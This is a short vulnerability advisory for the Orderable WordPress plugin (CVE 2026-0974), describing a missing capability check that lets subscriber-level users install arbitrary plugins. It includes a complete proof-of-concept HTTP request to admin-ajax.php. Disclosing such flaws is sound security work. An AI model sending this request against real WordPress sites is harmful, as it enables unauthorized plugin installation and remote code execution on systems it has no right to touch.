Orderable <= 1.20.0 – Subscriber+ Arbitrary Plugin Installation | CVE 2026-0974

Description

The plugin is vulnerable to unauthorized plugin installation due to a missing capability check on the 'install_plugin' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins, which can lead to Remote Code Execution.

Proof of Concept

POST /wp-admin/admin-ajax.php?action=iconic_onboard_orderable_install_plugin HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: <subscriber>
Content-Length: 84

plugin_slug=orderable&plugin_data[repo-slug]=hello-dolly&plugin_data[file]=hello.php